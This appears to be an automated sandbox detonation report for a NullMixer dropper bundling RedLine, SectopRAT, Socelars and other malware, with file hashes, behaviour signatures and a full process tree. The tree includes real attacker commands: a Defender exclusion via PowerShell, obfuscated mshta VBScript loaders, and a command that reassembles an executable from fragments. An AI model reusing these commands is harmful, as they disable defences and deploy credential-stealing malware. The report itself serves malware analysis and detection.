| MD5 | 7908fc00709580c4e12534bcd7ef8aae |
| SHA1 | 616616595f65c8fdaf1c5f24a4569e6af04e898f |
| SHA256 | 55fc7e624b75a66d04ed1dfc8d6957ceb013db94e9be29e779280378011d1399 |
| SHA512 | 0d5a72410d628d3bf6ff9188a69f378e04184ed603a620659f4084bd8a5a392577849c5aa895706eec5213b0036d24faafb8e153b458b5f53d8da7ce636b7a00 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07e3a022a8656c5ca.exe
| MD5 | b7ed5241d23ac01a2e531791d5130ca2 |
| SHA1 | 49df6413239d15e9464ed4d0d62e3d62064a45e9 |
| SHA256 | 98ac9097e514852804ca276aac3a319b07acf7219aef34e0d4fff6ea5b094436 |
| SHA512 | 1e4402c695a848bd62f172bd91eb3a4df8067c1fbc5f95dfd601d7a8c24ad81ac2e1f2e1280160087da8c8fbb72e957259661d759d8f7d9317cef3c64429a126 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0752b359bd184a.exe
| MD5 | aee0df0b273236965ad033c9a4be275f |
| SHA1 | ac8124f037441434c9881a2649e2e62bf276b1a6 |
| SHA256 | 622752355b43c5c019c6242b40c93288006b61fea2039d467bff1ac9c7e4dd85 |
| SHA512 | 759013680b6019d2783aabc1313bd949c564b7a8ecd267b626a9011963c0622dccfe3853f30df3c5d4434683adcf08372305abfae974692ed5cbc2d55842567f |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0741b6b6c3.exe
| MD5 | f75e29fdd8803d46736be53a119c0814 |
| SHA1 | e75af0dd2e15043e49684e599bd76f037abbee64 |
| SHA256 | fe9cac8ff86d68feb4e76f8bc04c345e767353feed2a5fe8c98cc9a42b8739af |
| SHA512 | 223587ca8c9974976f07a683607cabf9e6414878121be48a4831ce7b5c2bbde7dcfc3dd6454999c135952fddc307d99b47c008a5417d3ab91b58775a6dc92b12 |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0750d1e499.exe
| MD5 | 725101e70fc2007633fca44a6129d46c |
| SHA1 | cd4806d4b7889bf86e80b60e207fd78b32c8c841 |
| SHA256 | 7d7b882da2072450c3924d2b0cbc22e74d4155e8db6a9a14d4932ca5dadf8967 |
| SHA512 | 72c23216429adb6ee0ac52224ace136acedb5f7d4af9dac2bb557cda1843e5239480b97e4be86abc9654e8a273a3f69af36c7dd0500efd247ab3b0b678e7194d |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07dc9d2dae027.exe
| MD5 | 69f0fe993f6e63c9e7a2b739ec956e82 |
| SHA1 | 6f9a1b7a9fceac26722da17e204f57a47d7b66a5 |
| SHA256 | ee4355899a94ed5b369d8a8851d52ef2286c01af577e70bc82f43a5f4716fb0b |
| SHA512 | 1f81e0b8c3a5748a2aa47e02f8b1c1fc09e8d81871a607a148343ac3c579b82685f41eddf2070976a31aabccef0e70303c05d30e0c78c287a5c478c886185b1a |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun0794d0eebce1.exe
| MD5 | 0f1ef1bad121bd626d293df70f9c73f8 |
| SHA1 | 790d44990c576d1da37e535a447dc6b7270b4ca2 |
| SHA256 | 327e9994d62d8a1042f96db61359c9258ebc9c703f9a536801da79b196c221d3 |
| SHA512 | b626ccadfd53383a1f18d4604b4adac6ac5a0bd010089be26dd026e4a44f565813cff3711cc9343c9112a6cbcdcff208d209fba9e94f1103746e50af83be171b |
C:\Users\Admin\AppData\Local\Temp\7zS8BAFBB57\Sun07cad998fb20a18.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-22 09:57
Reported
2024-11-22 09:59
Platform
win10v2004-20241007-en
Max time kernel
119s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07be2debb1a.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2456 set thread context of 1892 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun075246a0bffeab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07e3a022a8656c5ca.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07778dd9fc6d53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0741b6b6c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07be2debb1a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0752b359bd184a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0741b6b6c3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0741b6b6c3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0741b6b6c3.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767431098887220" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0752b359bd184a.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe
"C:\Users\Admin\AppData\Local\Temp\28bf29dd4aa031d8f0583b3ea8ad4fb4e67cfddec09957e7c4c423e3378b08db.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0741b6b6c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0752b359bd184a.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07be2debb1a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07e3a022a8656c5ca.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun075246a0bffeab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07778dd9fc6d53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07fcb30681127.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07dc9d2dae027.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0750d1e499.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0794d0eebce1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe
Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe
Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0741b6b6c3.exe
Sun0741b6b6c3.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0750d1e499.exe
Sun0750d1e499.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07fcb30681127.exe
Sun07fcb30681127.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07be2debb1a.exe
Sun07be2debb1a.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0752b359bd184a.exe
Sun0752b359bd184a.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07dc9d2dae027.exe
Sun07dc9d2dae027.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun075246a0bffeab.exe
Sun075246a0bffeab.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07778dd9fc6d53.exe
Sun07778dd9fc6d53.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07e3a022a8656c5ca.exe
Sun07e3a022a8656c5ca.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1124 -ip 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1124 -s 580
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4512 -ip 4512
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun0794d0eebce1.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 356
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0061DD97\Sun07cad998fb20a18.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sun07cad998fb20a18.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2720 -ip 2720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2720 -ip 2720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2720 -ip 2720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 636
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffd3c95cc40,0x7ffd3c95cc4c,0x7ffd3c95cc58
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2720 -ip 2720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 808
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,11916760744117134313,3762882936591314949,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,11916760744117134313,3762882936591314949,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,11916760744117134313,3762882936591314949,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2580 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2720 -ip 2720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 840
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,11916760744117134313,3762882936591314949,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,11916760744117134313,3762882936591314949,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
